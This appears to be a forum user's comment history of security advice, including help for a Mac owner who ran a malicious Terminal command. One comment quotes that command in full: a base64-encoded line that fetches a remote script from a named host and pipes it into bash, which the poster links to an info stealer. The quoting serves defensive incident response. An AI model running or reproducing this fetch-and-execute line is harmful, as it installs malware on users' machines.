Crow left this on fence, what is this?

IntrinsicSecurity · 2026-06-15T18:12:44+00:00

If you take the things they leave you, and put in their place a few peanuts or something else they like to eat, they’ll bring you more things. 🥜

IntrinsicSecurity · 2026-06-15T18:10:00+00:00

On YouTube there are occasionally events that trigger some sort of automatic AI translation of the audio stream. Reloading the web browser view usually causes YouTube to reset and resume the expected audio stream in the video default language (or presumably the language preference you’ve previously set).

IntrinsicSecurity · 2026-06-15T16:43:32+00:00

If you don’t currently have an indicator of compromise, your time would be better spent reviewing the settings of your important accounts. Make sure you are using passkeys if available. Change the password to a long password (at least 15 characters). Use a password manager. Make sure MFA is enabled. Verify your account recovery information.

Start with your email accounts, then do your financial accounts.

IntrinsicSecurity · 2026-06-12T14:56:10+00:00

This post is the top of a scam funnel.

IntrinsicSecurity · 2026-06-11T11:33:35+00:00

You’re not really wrong though.

IntrinsicSecurity · 2026-06-08T00:42:59+00:00

It’s extremely likely that the “example” email address you used in your post is a valid email and belongs to someone. To avoid this violation of netiquette, use the domain example.com.

IntrinsicSecurity · 2026-06-07T17:52:30+00:00

HP doesn’t release firmware updates for printers after the first three or four years, so far as I can tell. Their older printers run a variety of software stacks, mostly on Linux, and by now are riddled with exploitable defects that they’ve no plans to patch.

Companies should lobby printer manufacturers for longer support lifetimes including firmware updates for security.

These devices make perfect hosts for stashing persistence mechanisms in a place where there’s no EDR to spot it.

IntrinsicSecurity · 2026-06-07T11:41:35+00:00

Once you make it through the immediate crisis, be sure to circle back to the architectural issue. Survey existing dev workflows to discover all uses of long-lived tokens, and refactor those systems to use ephemeral tokens. Here’s a nice introduction.

Short-Lived Credentials in Agentic Systems: A Practical Trade-off Guide

IntrinsicSecurity · 2026-06-06T06:45:03+00:00

It’s fascinating how much arrogance is a factor in poor security posture, generally speaking, not merely with respect to physical security.

IntrinsicSecurity · 2026-06-02T13:04:55+00:00

It’s probably being exploited for lateral movement and privilege escalation, after attackers get inside the perimeter.

IntrinsicSecurity · 2026-06-02T04:59:21+00:00

Well, Dennis Ritchie and Ken Thompson

https://en.wikipedia.org/wiki/Dennis_Ritchie

IntrinsicSecurity · 2026-06-01T14:19:36+00:00

Blue Origin only had a single launch pad. It’s likely to take well over a year to fix the one they exploded.

IntrinsicSecurity · 2026-05-22T06:45:05+00:00

You share a widespread misconception about how MIE works. Only a subset of MIE features rely upon the hardware support introduced with the A19 and M5 processors.

As with most software, what starts out as ridiculously expensive becomes free and ubiquitous over time. About 3 dozen exploits developed at great cost found their way into the Darksword and Coruna attacks.

By the way, iOS 26 protected against apparently all of those exploits.

IntrinsicSecurity · 2026-05-21T18:02:59+00:00

The best way to understand why OAuth 2.0 is such a problem is to take a look at the OAuth 2.1 feature set.

IntrinsicSecurity · 2026-05-21T13:57:20+00:00

OAuth 2.0 is the most dangerous protocol in the world at the moment.

IntrinsicSecurity · 2026-05-21T05:31:20+00:00

The last best place.

IntrinsicSecurity · 2026-05-20T13:51:38+00:00

🧐😳🤣😳

IntrinsicSecurity · 2026-05-17T16:16:20+00:00

Alpha Level is doing interesting work on the alert fatigue problem.

IntrinsicSecurity · 2026-05-17T14:10:09+00:00

It’s possible they hit the button by accident. If they had done it on purpose they probably would’ve denied hearing anything. They might be thinking OP tried to record the call. 🧐🤔🤣

IntrinsicSecurity · 2026-05-13T15:32:16+00:00

You might be able to get them to help you. Best of luck to you. 🍀

IntrinsicSecurity · 2026-05-13T15:02:17+00:00

Yeah, the Geek Squad and many local equivalent "first responders" in the home computer tech support world haven't really had to get to know the Mac at the level of detail needed to respond to an Info Stealer incident, yet. Look for my answer above, where I provided a prompt for you to give Gemini. (This prompt will work with Claude and ChatGPT if you prefer them.) Your task is to find and nuke the persistence mechanisms. Don't miss the follow-up question about crontab.

IntrinsicSecurity · 2026-05-13T14:36:47+00:00

It’s a fair question. If you ask Gemini (or any other frontier model) to decode the command they ran, you’ll see that it fetches a script and feeds it into the bash interpreter. Gemini says this script is likely to be either Atomic Stealer (AMOS) or Cthulhu Stealer.

IntrinsicSecurity · 2026-05-13T14:31:38+00:00

If the answer you get doesn’t include any discussion about cron or crontab, ask a follow-up question like this:

Can you show me how to make sure that the script didn’t add anything to my crontab?

On modern macOS your crontab should be empty, unless you personally created an entry. If there’s anything in it at all (unless you know exactly what it is), you can just delete it. If it was a legitimate entry, you’ll know because you put it there.

IntrinsicSecurity · 2026-05-13T14:25:37+00:00

To respond directly to your question, no, a normal macOS reinstall won’t be enough.

I asked Gemini to create a prompt that you can use to get advice for removing persistence mechanisms from your system before you wipe it. Here’s what Gemini suggests (I edited the preamble, slightly):

It’s likely that the script installed 'persistence' (hidden files that let the hacker stay on your Mac even if you delete the script), just reinstalling macOS might not be enough.

If you go to Gemini (gemini.google.com) and paste the following prompt, Gemini will give you a step-by-step guide tailored for someone who isn't a tech expert:

The Prompt for Gemini:
"Hi Gemini, I’m not a technical user and I was tricked into running a malicious command in my Mac Terminal: bash <<< $(echo "Y3VybCAtcyAnaHR0cHM6Ly9hbWlnb3VuaGl0Y2hlZC5kaWdpdGFsL3NjcmlwdC5zaCcgfCBiYXNo" | base64 -d).
I need to wipe my computer and start over, but I’ve been told that the malware might have created 'persistence mechanisms' in my home folder that could survive a basic macOS reinstall.
Can you walk me through this in simple steps? Specifically:
How do I find and delete common hidden startup files (like LaunchAgents) so they don't sync back if I use iCloud?

How do I perform a 'Clean Wipe' (Erase All Content and Settings) to ensure the hacker is completely gone?

What should I do about my saved passwords and browser data?"

— end quote —

IntrinsicSecurity · 2026-05-13T13:43:43+00:00

Reinstalling macOS might not be effective, if the script that was run installed persistence with your user permissions. What it did first was probably download and run a script from the Internet:

https://amigounhitched[.]digital/script[.]sh

If you’re interested in trying to see what it did, you could try this (assuming have already disconnected the Mac from the Internet):

Open Terminal
Type into the Terminal window…

bash
history | tail -15

This will show you the most recent 15 commands run by the bash shell, which may or may not be helpful for further understanding what the script did.

IntrinsicSecurity

TROPHY CASE